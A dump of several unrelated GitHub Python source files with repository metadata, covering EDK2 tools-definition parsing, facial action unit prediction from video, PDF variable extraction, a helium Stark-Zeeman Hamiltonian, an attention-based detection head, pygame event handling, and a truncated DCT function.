self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY] = {}\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] = Value\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY] = {}\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n elif List[1] not in self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] = Value\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n elif self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY][List[1]] != Value:\r\n EdkLogger.verbose(\"Line %d: No override allowed for the family of a tool chain: %s\" % ((Index + 1), Name))\r\n if List[4] == TAB_TOD_DEFINES_BUILDRULEFAMILY and List[2] == TAB_STAR and List[3] == TAB_STAR:\r\n if TAB_TOD_DEFINES_BUILDRULEFAMILY not in self.ToolsDefTxtDatabase \\\r\n or List[1] not in self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_FAMILY]:\r\n EdkLogger.verbose(\"Line %d: The family is not specified, but BuildRuleFamily is specified for the tool chain: %s\" % ((Index + 1), Name))\r\n self.ToolsDefTxtDatabase[TAB_TOD_DEFINES_BUILDRULEFAMILY][List[1]] = Value\r\n\r\n ## ExpandMacros\r\n #\r\n # Replace defined macros with real value\r\n #\r\n # @param Value: The string with unreplaced macros\r\n #\r\n # @retval Value: The string which has been replaced with real value\r\n #\r\n def ExpandMacros(self, Value):\r\n # os.environ contains all environment variables uppercase on Windows which cause the key in the self.MacroDictionary is uppercase, but Ref may not\r\n EnvReference = gEnvRefPattern.findall(Value)\r\n for Ref in EnvReference:\r\n if Ref not in self.MacroDictionary and Ref.upper() not in self.MacroDictionary:\r\n Value = Value.replace(Ref, \"\")\r\n else:\r\n if Ref in self.MacroDictionary:\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref])\r\n else:\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref.upper()])\r\n MacroReference = gMacroRefPattern.findall(Value)\r\n for Ref in MacroReference:\r\n if Ref not in self.MacroDictionary:\r\n return False, Ref\r\n Value = Value.replace(Ref, self.MacroDictionary[Ref])\r\n\r\n return True, Value\r\n\r\n## ToolDefDict\r\n#\r\n# Load tools_def.txt in input Conf dir\r\n#\r\n# @param ConfDir: Conf dir\r\n#\r\n# @retval ToolDef An instance of ToolDefClassObject() with loaded tools_def.txt\r\n#\r\n\r\n\r\nclass ToolDefDict():\r\n\r\n def __new__(cls, ConfDir, *args, **kw):\r\n if not hasattr(cls, '_instance'):\r\n orig = super(ToolDefDict, cls)\r\n cls._instance = orig.__new__(cls, *args, **kw)\r\n return cls._instance\r\n\r\n def __init__(self, ConfDir):\r\n self.ConfDir = ConfDir\r\n if not hasattr(self, 'ToolDef'):\r\n self._ToolDef = None\r\n\r\n @property\r\n def ToolDef(self):\r\n if not self._ToolDef:\r\n self._GetToolDef()\r\n return self._ToolDef\r\n\r\n def _GetToolDef(self):\r\n TargetObj = TargetTxtDict()\r\n Target = TargetObj.Target\r\n ToolDef = ToolDefClassObject()\r\n if TAB_TAT_DEFINES_TOOL_CHAIN_CONF in Target.TargetTxtDictionary:\r\n ToolsDefFile = Target.TargetTxtDictionary[TAB_TAT_DEFINES_TOOL_CHAIN_CONF]\r\n if ToolsDefFile:\r\n ToolDef.LoadToolDefFile(os.path.normpath(ToolsDefFile))\r\n else:\r\n ToolDef.LoadToolDefFile(os.path.normpath(os.path.join(self.ConfDir, gDefaultToolsDefFile)))\r\n else:\r\n ToolDef.LoadToolDefFile(os.path.normpath(os.path.join(self.ConfDir, gDefaultToolsDefFile)))\r\n self._ToolDef = ToolDef\r\n\r\n##\r\n#\r\n# This acts like the main() function for the script, unless it is 'import'ed into another\r\n# 
script.\r\n#\r\nif __name__ == '__main__':\r\n ToolDef = ToolDefDict(os.getenv(\"WORKSPACE\"))\r\n pass\r\n","repo_name":"CloverHackyColor/CloverBootloader","sub_path":"BaseTools/Source/Python/Common/ToolDefClassObject.py","file_name":"ToolDefClassObject.py","file_ext":"py","file_size_in_byte":12862,"program_lang":"python","lang":"en","doc_type":"code","stars":4186,"dataset":"github-code","pt":"53"} +{"seq_id":"41256528630","text":"from os.path import join, abspath, dirname\nfrom feat import Detector\nimport pandas as pd\nfrom tqdm import tqdm\nimport json\n\ndef openListOnFile ():\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"w\") as f:\n f.write(\"[\\n\")\n\ndef closeListOnFile ():\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(\"\\n]\")\n\ndef getPrediction (videoPath:str, detector:Detector) -> pd.DataFrame:\n return detector.detect_video(videoPath) #skip_frames = None\n\ndef cleanPrediction (predictions: pd.DataFrame) -> pd.DataFrame:\n #removal of unused columns\n newPredictions = predictions.filter(regex='^AU')\n return pd.concat([newPredictions, predictions[\"input\"]], axis=1)\n\ndef getPredictionsFromVideosPaths (videoPath:list, detector:Detector, lastOne:bool) -> pd.DataFrame:\n prediciton = getPrediction (videoPath, detector)#qui ho già la predizione per tutti i frame all'interno del video\n prediciton = cleanPrediction (prediciton)\n \n if not lastOne:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(prediciton.to_json(indent=4) + \",\\n\")\n else:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"a\") as f:\n f.write(prediciton.to_json(indent=4))\n\ndef makeAndSavePredictionsOnFile (videosPathMain: list, detector:Detector) -> list [dict]:\n openListOnFile () # i save the predictions on file but the list of the objects generated is not json serializable *\n for path in tqdm(videosPathMain):\n try:\n getPredictionsFromVideosPaths(path, detector, path == videosPathMain[-1])\n except Exception as e:\n print (e)\n closeListOnFile() # * so i open and close the list on the file and save each item in append on the file \n\n\ndef readPredictionsListFromFile () -> list [dict]:\n with open ((join(dirname(abspath(__file__)), \"predictions.json\")), \"r\") as f:\n data = json.load(f)\n\n return data","repo_name":"AlessandroCarella/bachelor-s-thesis","sub_path":"src/WOman/getPredictionsAndSaveThemOnFile.py","file_name":"getPredictionsAndSaveThemOnFile.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10085906108","text":"from typing import Dict, List, Any\nfrom config import get_dataset_config as config\nfrom utils.pdf_reader import PdfExtractVariables\nimport os\nimport glob\nimport json\n\n# Retrieve datasets\nprint(\"Retrieving datasets...\")\ndatasets_path = config.DATASETS_PATH\n\ndatasets_list = os.scandir(datasets_path)\ndatasets_list = [data.path for data in datasets_list if data.is_dir()]\n\n# Instantiate dictionary\ndictionary: Dict[Any, Dict[Any, List[Any]]] = {}\n\n# Get variables\nprint(\"Extracting variables from datatables...\")\nfor data in datasets_list:\n print(\"Pdf: {}\".format(data))\n # Get pdf of variables\n variables_pdf = glob.glob(os.path.sep.join([data, 'Descripcion_Archivos', '*.pdf']))[0]\n\n # Extract pdf information\n variables_pdf = PdfExtractVariables(variables_pdf)\n\n # Get databases and descriptions\n 
databases_list, databases_descriptions = variables_pdf.get_databases_list()\n\n # Get dictionary\n database_dict = variables_pdf.get_databases(databases_list, databases_descriptions)\n\n # Convert tables obtained in dictionary from df to json in order to serialize\n for (data_name, (data_desc, data_table)) in database_dict.items():\n table = data_table.copy()\n table.reset_index(inplace=True, drop=True)\n table = table.rename(columns=table.iloc[0]).drop(table.index[0])\n table.reset_index(inplace=True, drop=True)\n database_dict[data_name][1] = table.to_json()\n\n # Append to overall dictionary\n dictionary[data] = database_dict\n\n# Save dictionary as json file\nprint(\"Loading extracted variables to json dictionary...\")\noutput_path = config.VARIABLE_DICTIONARIES_PATH\nwith open(os.sep.join([output_path, 'dictionary.json']), 'w') as file:\n json.dump(dictionary, file, sort_keys=False)\n","repo_name":"avaimar/INEGI_Revolution","sub_path":"02_Scripts/01_Process_data/02_Get_variables_from_pdf.py","file_name":"02_Get_variables_from_pdf.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32995011351","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed 04 Jul 2017\n\n@author: Alex Morgan, UNIVERSITY COLLEGE LONDON.\n\"\"\"\nfrom operator import attrgetter\nimport numpy as np\nfrom tqdm import trange\nfrom .Basis import Basis, basis_states\nfrom .State import State, get_qd, energy\nfrom .InteractionMatrix import InteractionMatrix, stark_interaction, zeeman_interaction\nfrom .constants import *\nfrom .numerov import wf\n\nclass HamiltonianMatrix(object):\n \"\"\" The total Hamiltonian matrix. Each element of the basis set is an\n instance of the class 'State', which represents |n L S J MJ>.\n \"\"\"\n def __init__(self, n_min, n_max, L_max=None, S=None, M=None, M_max=None, basis_type='ml'):\n self.basis = basis_states(basis_type.lower(), n_min, n_max, L_max=L_max, S=S, M=M, M_max=M_max)\n self.sort_basis('E0', inplace=True)\n self.num_states = len(self.basis.states)\n self._h0_matrix = None\n self._stark_matrix = None\n self._zeeman_matrix = None\n \n def sort_basis(self, attribute, inplace=False):\n \"\"\" Sort basis on attribute.\n \"\"\"\n sorted_basis = sorted(self.basis.states, key=attrgetter(attribute))\n if inplace:\n self.basis.states = sorted_basis\n return sorted_basis\n\n def attrib(self, attribute):\n \"\"\" List of given attribute values from all elements in the basis, e.g., J or E0.\n \"\"\"\n return [getattr(el, attribute) for el in self.basis.states]\n\n def where(self, attribute, value):\n \"\"\" Indexes of where basis.attribute == value.\n \"\"\"\n arr = self.attrib(attribute)\n return [i for i, x in enumerate(arr) if x == value]\n \n def __str__(self):\n \"\"\" To String method\n \"\"\"\n return str(self.basis)\n\n def h0_matrix(self, **kwargs):\n \"\"\" Unperturbed Hamiltonian.\n \"\"\"\n cache = kwargs.get('cache_matrices', True)\n if self._h0_matrix is None or cache is False:\n self._h0_matrix = np.diag(self.attrib('E0'))\n return self._h0_matrix\n \n def stark_map(self, Efield, Bfield=0.0, **kwargs):\n \"\"\" The eigenvalues of H_0 + H_S + H_Z, for a range of electric fields.\n \n args:\n Efield dtype: list units: V / m \n\n Bfield=0.0 dtype: float units: T\n \n kwargs:\n field_angle=0.0 dtype: [float]\n\n specifies the angle between the electric and magnetic fields.\n \n eig_vec=False dtype: bool\n\n returns the eigenvalues and eigenvectors for \n every field 
value.\n\n Nb. A large map with eignvectors can take up a LOT of memory.\n \"\"\"\n if (not kwargs.get('field_angle', 0.0) == 0.0) and \\\n ((not self.M == None) or (not self.M_max == None)):\n print('WARNING: If the fields are not parallel then all'+\\\n ' ML sub-manifolds are required for accurate results!')\n \n tqdm_kwargs = dict([(x.replace('tqdm_', ''), kwargs[x]) for x in kwargs.keys() if 'tqdm_' in x])\n get_eig_vec = kwargs.get('eig_vec', False)\n num_fields = len(Efield)\n # initialise output arrays\n eig_val = np.empty((num_fields, self.num_states), dtype=float)\n if get_eig_vec:\n eig_vec = np.empty((num_fields, self.num_states, self.num_states), dtype=float)\n # optional magnetic field\n if Bfield != 0.0:\n Bz = mu_B * Bfield / En_h\n self._zeeman_matrix = InteractionMatrix(matrix_type='zeeman', basis=self.basis, **kwargs)\n H_Z = Bz * self._zeeman_matrix.matrix\n else:\n H_Z = 0.0\n # loop over electric field values\n self._stark_matrix = InteractionMatrix(matrix_type='stark', basis=self.basis, **kwargs)\n for i in trange(num_fields, desc=\"Diagonalise Hamiltonian\", **tqdm_kwargs):\n Fz = Efield[i] * e * a_0 / En_h\n H_S = Fz * self._stark_matrix.matrix / mu_me\n # diagonalise, assuming matrix is Hermitian.\n if get_eig_vec:\n # eigenvalues and eigenvectors\n eig_val[i], eig_vec[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z) \n else:\n # eigenvalues\n eig_val[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z)[0]\n # output\n if get_eig_vec:\n return eig_val * En_h_He/mu_me, eig_vec\n else:\n return eig_val * En_h_He/mu_me\n\n def zeeman_map(self, Bfield, Efield=0.0, **kwargs):\n \"\"\" The eigenvalues of H_0 + H_S + H_Z, for a range of magnetic fields.\n \n args:\n Bfield dtype: list units: T \n\n Efield=0.0 dtype: float units: V / m\n \n kwargs:\n field_angle=0.0 dtype: [float]\n\n specifies the angle between the electric and magnetic fields.\n \n eig_vec=False dtype: bool\n\n returns the eigenvalues and eigenvectors for \n every field value.\n \n Nb. 
A large map with eignvectors can take up a LOT of memory.\n \"\"\"\n tqdm_kwargs = dict([(x.replace('tqdm_', ''), kwargs[x]) for x in kwargs.keys() if 'tqdm_' in x])\n get_eig_vec = kwargs.get('eig_vec', False)\n num_fields = len(Bfield)\n # initialise output arrays\n eig_val = np.empty((num_fields, self.num_states), dtype=float)\n if get_eig_vec:\n eig_vec = np.empty((num_fields, self.num_states, self.num_states), dtype=float)\n # optional electric field\n if Efield != 0.0:\n Fz = Efield * e * a_0 / En_h\n self._stark_matrix = InteractionMatrix(matrix_type='stark', basis=self.basis, **kwargs)\n H_S = Fz * self._stark_matrix.matrix / mu_me\n else:\n H_S = 0.0\n # loop over magnetic field values\n self._zeeman_matrix = InteractionMatrix(matrix_type='zeeman', basis=self.basis, **kwargs)\n for i in trange(num_fields, desc=\"Diagonalise Hamiltonian\", **tqdm_kwargs):\n Bz = mu_B * Bfield[i] / En_h\n H_Z = Bz * self._zeeman_matrix.matrix \n # diagonalise, assuming matrix is Hermitian.\n if get_eig_vec:\n # eigenvalues and eigenvectors\n eig_val[i], eig_vec[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z) \n else:\n # eigenvalues\n eig_val[i] = np.linalg.eigh(self.h0_matrix(**kwargs) + H_S + H_Z)[0]\n # output\n if get_eig_vec:\n return eig_val * En_h, eig_vec\n else:\n return eig_val * En_h","repo_name":"aa-morgan/helium-stark-zeeman","sub_path":"hsz/HamiltonianMatrix.py","file_name":"HamiltonianMatrix.py","file_ext":"py","file_size_in_byte":6939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71103387047","text":"# Based on https://github.com/Scalsol/mega.pytorch/blob/master/mega_core/modeling/roi_heads/box_head/roi_box_feature_extractors.py\n# and https://github.com/facebookresearch/detectron2/blob/v0.1.1/detectron2/modeling/roi_heads/box_head.py\nimport math\n\nimport numpy as np\nimport torch\nimport fvcore.nn.weight_init as weight_init\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom detectron2.layers import Conv2d, ShapeSpec, get_norm\nfrom detectron2.modeling.roi_heads import ROI_BOX_HEAD_REGISTRY\n\nclass AttentionExtractor(nn.Module):\n def __init__(self, cfg, in_channels):\n super(AttentionExtractor, self).__init__()\n\n @staticmethod\n def extract_position_embedding(position_mat, feat_dim, wave_length=1000.0):\n device = position_mat.device\n # position_mat, [num_rois, num_nongt_rois, 4]\n feat_range = torch.arange(0, feat_dim / 8, device=device)\n dim_mat = torch.full((len(feat_range),), wave_length, device=device).pow(8.0 / feat_dim * feat_range)\n dim_mat = dim_mat.view(1, 1, 1, -1).expand(*position_mat.shape, -1)\n\n position_mat = position_mat.unsqueeze(3).expand(-1, -1, -1, dim_mat.shape[3])\n position_mat = position_mat * 100.0\n\n div_mat = position_mat / dim_mat\n sin_mat, cos_mat = div_mat.sin(), div_mat.cos()\n\n # [num_rois, num_nongt_rois, 4, feat_dim / 4]\n embedding = torch.cat([sin_mat, cos_mat], dim=3)\n # [num_rois, num_nongt_rois, feat_dim]\n embedding = embedding.reshape(embedding.shape[0], embedding.shape[1], embedding.shape[2] * embedding.shape[3])\n\n return embedding\n\n @staticmethod\n def extract_position_matrix(bbox, ref_bbox):\n xmin, ymin, xmax, ymax = torch.chunk(ref_bbox, 4, dim=1)\n bbox_width_ref = xmax - xmin + 1\n bbox_height_ref = ymax - ymin + 1\n center_x_ref = 0.5 * (xmin + xmax)\n center_y_ref = 0.5 * (ymin + ymax)\n\n xmin, ymin, xmax, ymax = torch.chunk(bbox, 4, dim=1)\n bbox_width = xmax - xmin + 1\n bbox_height = ymax - ymin + 1\n center_x = 0.5 * 
(xmin + xmax)\n center_y = 0.5 * (ymin + ymax)\n\n delta_x = center_x - center_x_ref.transpose(0, 1)\n delta_x = delta_x / bbox_width\n delta_x = (delta_x.abs() + 1e-3).log()\n\n delta_y = center_y - center_y_ref.transpose(0, 1)\n delta_y = delta_y / bbox_height\n delta_y = (delta_y.abs() + 1e-3).log()\n\n delta_width = bbox_width / bbox_width_ref.transpose(0, 1)\n delta_width = delta_width.log()\n\n delta_height = bbox_height / bbox_height_ref.transpose(0, 1)\n delta_height = delta_height.log()\n\n position_matrix = torch.stack([delta_x, delta_y, delta_width, delta_height], dim=2)\n\n return position_matrix\n\n def attention_module_multi_head(self, roi_feat, ref_feat, position_embedding,\n feat_dim=1024, dim=(1024, 1024, 1024), group=16,\n index=0):\n \"\"\"\n :param roi_feat: [num_rois, feat_dim]\n :param ref_feat: [num_nongt_rois, feat_dim]\n :param position_embedding: [1, emb_dim, num_rois, num_nongt_rois]\n :param feat_dim: should be same as dim[2]\n :param dim: a 3-tuple of (query, key, output)\n :param group:\n :return:\n \"\"\"\n dim_group = (dim[0] / group, dim[1] / group, dim[2] / group)\n\n # position_embedding, [1, emb_dim, num_rois, num_nongt_rois]\n # -> position_feat_1, [1, group, num_rois, num_nongt_rois]\n if position_embedding is not None:\n position_feat_1 = F.relu(self.Wgs[index](position_embedding))\n # aff_weight, [num_rois, group, num_nongt_rois, 1]\n aff_weight = position_feat_1.permute(2, 1, 3, 0)\n # aff_weight, [num_rois, group, num_nongt_rois]\n aff_weight = aff_weight.squeeze(3)\n \n # multi head\n assert dim[0] == dim[1]\n\n q_data = self.Wqs[index](roi_feat)\n q_data_batch = q_data.reshape(-1, group, int(dim_group[0]))\n # q_data_batch, [group, num_rois, dim_group[0]]\n q_data_batch = q_data_batch.permute(1, 0, 2)\n\n k_data = self.Wks[index](ref_feat)\n k_data_batch = k_data.reshape(-1, group, int(dim_group[1]))\n # k_data_batch, [group, num_nongt_rois, dim_group[1]]\n k_data_batch = k_data_batch.permute(1, 0, 2)\n\n # v_data, [num_nongt_rois, feat_dim]\n v_data = ref_feat\n\n # aff, [group, num_rois, num_nongt_rois]\n aff = torch.bmm(q_data_batch, k_data_batch.transpose(1, 2))\n aff_scale = (1.0 / math.sqrt(float(dim_group[1]))) * aff\n # aff_scale, [num_rois, group, num_nongt_rois]\n aff_scale = aff_scale.permute(1, 0, 2)\n\n # weighted_aff, [num_rois, group, num_nongt_rois]\n if position_embedding is not None:\n weighted_aff = (aff_weight + 1e-6).log() + aff_scale\n else:\n weighted_aff = aff_scale\n aff_softmax = F.softmax(weighted_aff, dim=2)\n\n aff_softmax_reshape = aff_softmax.reshape(aff_softmax.shape[0] * aff_softmax.shape[1], aff_softmax.shape[2])\n\n # output_t, [num_rois * group, feat_dim]\n output_t = torch.matmul(aff_softmax_reshape, v_data)\n # output_t, [num_rois, group * feat_dim, 1, 1]\n output_t = output_t.reshape(-1, group * feat_dim, 1, 1)\n # linear_out, [num_rois, dim[2], 1, 1]\n linear_out = self.Wvs[index](output_t)\n\n output = linear_out.squeeze(3).squeeze(2)\n mean_weight = torch.mean(aff_softmax, dim=1)\n\n return output, mean_weight\n\n def cal_position_embedding(self, rois1, rois2):\n # [num_rois, num_nongt_rois, 4]\n position_matrix = self.extract_position_matrix(rois1, rois2)\n # [num_rois, num_nongt_rois, 64]\n position_embedding = self.extract_position_embedding(position_matrix, feat_dim=64)\n\n # [64, num_rois, num_nongt_rois]\n position_embedding = position_embedding.permute(2, 0, 1)\n\n # TODO: might not be necessary with new PyTorch versions: https://github.com/pytorch/pytorch/issues/29992\n position_embedding = 
position_embedding.contiguous()\n\n # [1, 64, num_rois, num_nongt_rois]\n position_embedding = position_embedding.unsqueeze(0)\n\n return position_embedding\n\n\n######################################################################\n@ROI_BOX_HEAD_REGISTRY.register()\nclass AttentionFCHead(AttentionExtractor):\n \"\"\"\n A head with several 3x3 conv layers (each followed by norm & relu) and\n several fc layers (each followed by relu).\n \"\"\"\n\n def __init__(self, cfg, input_shape: ShapeSpec):\n \"\"\"\n The following attributes are parsed from config:\n num_conv, num_fc: the number of conv/fc layers\n conv_dim/fc_dim: the dimension of the conv/fc layers\n norm: normalization for the conv layers\n \"\"\"\n super().__init__(cfg, input_shape)\n\n\n # TODO: move to layers.py?\n def make_fc(dim_in, hidden_dim, use_gn=False):\n '''\n Caffe2 implementation uses XavierFill, which in fact\n corresponds to kaiming_uniform_ in PyTorch\n '''\n assert not use_gn\n # if use_gn:\n # fc = nn.Linear(dim_in, hidden_dim, bias=False)\n # nn.init.kaiming_uniform_(fc.weight, a=1)\n # return nn.Sequential(fc, group_norm(hidden_dim))\n fc = nn.Linear(dim_in, hidden_dim)\n nn.init.kaiming_uniform_(fc.weight, a=1)\n nn.init.constant_(fc.bias, 0)\n return fc\n\n # fmt: off\n fc_dim = cfg.MODEL.ROI_BOX_HEAD.FC_DIM\n norm = cfg.MODEL.ROI_BOX_HEAD.NORM\n\n self.embed_dim = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.EMBED_DIM\n self.groups = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.GROUP\n self.feat_dim = fc_dim\n self.base_stage = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.STAGE\n self.advanced_stage = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.ADVANCED_STAGE\n self.base_num = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.REF_POST_NMS_TOP_N\n self.advanced_num = int(self.base_num * cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.RDN_RATIO)\n self.location_free = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.ATTENTION.LOCATION_FREE\n # fmt: on\n\n self._output_size = (input_shape.channels, input_shape.height, input_shape.width)\n input_size = np.prod((input_shape.channels, input_shape.height, input_shape.width))\n\n\n fcs, Wgs, Wqs, Wks, Wvs = [], [], [], [], []\n for i in range(self.base_stage + self.advanced_stage + 1):\n r_size = input_size if i == 0 else fc_dim\n\n if i == self.base_stage and self.advanced_stage == 0:\n break\n\n if i != self.base_stage + self.advanced_stage:\n fcs.append(make_fc(r_size, fc_dim))\n self._output_size = fc_dim\n Wgs.append(Conv2d(self.embed_dim, self.groups, kernel_size=1, stride=1, padding=0))\n Wqs.append(make_fc(self.feat_dim, self.feat_dim))\n Wks.append(make_fc(self.feat_dim, self.feat_dim))\n Wvs.append(Conv2d(self.feat_dim * self.groups, self.feat_dim, kernel_size=1, stride=1, padding=0, groups=self.groups))\n for l in [Wgs[i], Wvs[i]]:\n torch.nn.init.normal_(l.weight, std=0.01)\n torch.nn.init.constant_(l.bias, 0)\n self.fcs = nn.ModuleList(fcs)\n self.Wgs = nn.ModuleList(Wgs)\n self.Wqs = nn.ModuleList(Wqs)\n self.Wks = nn.ModuleList(Wks)\n self.Wvs = nn.ModuleList(Wvs)\n\n\n def forward(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer, pre_calculate=False):\n if self.training:\n return self._forward_train(x, proposals, long_term_feature_buffer, long_term_roi_buffer)\n else:\n return self._forward_test(x, proposals, long_term_feature_buffer, long_term_roi_buffer)\n\n\n def _forward_test(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer):\n\n assert len(proposals) == 1\n rois_cur = proposals[0].tensor\n rois_ref = 
torch.cat(list(long_term_roi_buffer) + [rois_cur[:self.base_num]])\n x = x.flatten(start_dim=1)\n \n if not self.location_free:\n position_embedding = self.cal_position_embedding(rois_cur, rois_ref)\n else:\n position_embedding = None\n\n for i in range(self.base_stage):\n x = F.relu(self.fcs[i](x))\n if i == 0:\n x_out = x[:self.base_num]\n x_refs = torch.cat(list(long_term_feature_buffer) + [x[:self.base_num]])\n attention, weights = self.attention_module_multi_head(x, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i)\n weights = weights.reshape(weights.shape[0], len(long_term_feature_buffer)+1,-1)\n\n x = x + attention\n\n if self.advanced_stage > 0:\n x_refs_adv = torch.cat([x[:self.advanced_num] for x in torch.split(x_refs, self.base_num, dim=0)], dim=0)\n rois_ref_adv = torch.cat([x[:self.advanced_num] for x in torch.split(rois_ref, self.base_num, dim=0)], dim=0)\n\n if not self.location_free:\n position_embedding_adv = torch.cat([x[..., :self.advanced_num] for x in torch.split(position_embedding, self.base_num, dim=-1)], dim=-1)\n position_embedding = self.cal_position_embedding(rois_ref_adv, rois_ref)\n else:\n position_embedding_adv = None\n position_embedding = None\n\n for i in range(self.advanced_stage):\n attention, _ = self.attention_module_multi_head(x_refs_adv, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i + self.base_stage)\n x_refs_adv = x_refs_adv + attention\n x_refs_adv = F.relu(self.fcs[i + self.base_stage](x_refs_adv))\n\n attention, _ = self.attention_module_multi_head(x, x_refs_adv, position_embedding_adv,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=self.base_stage + self.advanced_stage)\n x = x + attention\n\n return x, x_out, weights\n\n\n def _forward_train(self, x, proposals, long_term_feature_buffer, long_term_roi_buffer):\n\n assert len(proposals) == 1\n rois_cur = proposals[0].tensor\n rois_ref = torch.cat(list(long_term_roi_buffer))\n\n if not self.location_free:\n position_embedding = self.cal_position_embedding(rois_cur, rois_ref)\n else:\n position_embedding = None\n\n long_term_feature_buffer = [f.flatten(start_dim=1) for f in long_term_feature_buffer]\n x = x.flatten(start_dim=1)\n\n x_refs = torch.cat(list(long_term_feature_buffer))\n x_refs = F.relu(self.fcs[0](x_refs))\n\n for i in range(self.base_stage):\n x = F.relu(self.fcs[i](x))\n attention, _ = self.attention_module_multi_head(x, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i)\n x = x + attention\n\n if self.advanced_stage > 0:\n x_refs_adv = torch.cat([x[:self.advanced_num] for x in torch.split(x_refs, self.base_num, dim=0)], dim=0)\n rois_ref_adv = torch.cat([x[:self.advanced_num] for x in torch.split(rois_ref, self.base_num, dim=0)], dim=0)\n\n if not self.location_free:\n position_embedding_adv = torch.cat([x[..., :self.advanced_num] for x in torch.split(position_embedding, self.base_num, dim=-1)], dim=-1)\n position_embedding = self.cal_position_embedding(rois_ref_adv, rois_ref)\n else:\n position_embedding_adv = None\n position_embedding = None\n\n for i in range(self.advanced_stage):\n attention, _ = self.attention_module_multi_head(x_refs_adv, x_refs, position_embedding,\n feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=i + self.base_stage)\n x_refs_adv = x_refs_adv + attention\n x_refs_adv = F.relu(self.fcs[i + self.base_stage](x_refs_adv))\n\n attention, _ = self.attention_module_multi_head(x, x_refs_adv, position_embedding_adv,\n 
feat_dim=1024, group=16, dim=(1024, 1024, 1024),\n index=self.base_stage + self.advanced_stage)\n x = x + attention\n\n return x, None, None\n\n\n @property\n def output_size(self):\n return self._output_size\n\n\ndef build_st_box_head(cfg, input_shape):\n \"\"\"\n Build a box head defined by `cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.NAME`.\n \"\"\"\n name = cfg.MODEL.SPATIOTEMPORAL.ROI_BOX_HEAD.NAME\n return ROI_BOX_HEAD_REGISTRY.get(name)(cfg, input_shape)","repo_name":"daniel-cores/SLTnet","sub_path":"spatiotemporal/modeling/roi_heads/st_box_head.py","file_name":"st_box_head.py","file_ext":"py","file_size_in_byte":15577,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"36740755652","text":"import sys\n\nimport pygame\nfrom ship import Ship\nfrom settings import Settings\n\n\ndef check_events(ship):\n \"\"\"响应按键和鼠标事件\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ship)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n\n\ndef check_keydown_events(event, ship):\n \"\"\"响应键按下\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n ship.moving_left = True\n\n\ndef check_keyup_events(event, ship):\n \"\"\"响应键松开\"\"\"\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n ship.moving_left = False\n\n\ndef update_screen(ai_settings, screen, ship):\n \"\"\"更新屏幕上的图像,并且切换到新屏幕\"\"\"\n screen.fill(ai_settings.bg_color)\n\n ship.blitme()\n\n pygame.display.flip()\n","repo_name":"wanglinyou33/alien_invasion","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39868284144","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated: Brayan Quiceno\r\nLicense: Grupo de Geofísica y Ciencias de la Computación - GGC3\r\n Institución Universitaria ITM\r\n Medellín, Antioquia, Colombia\r\n\"\"\"\r\n#%% Libraries\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy\r\n\r\n#%% Function\r\ndef dct1D(x, q):\r\n N = len(x)\r\n \r\n DCT = []\r\n for k in range(1, q+1):\r\n # Kronecker Delta δ #\r\n if k==1: δ=1 #\r\n else: δ=0 #\r\n 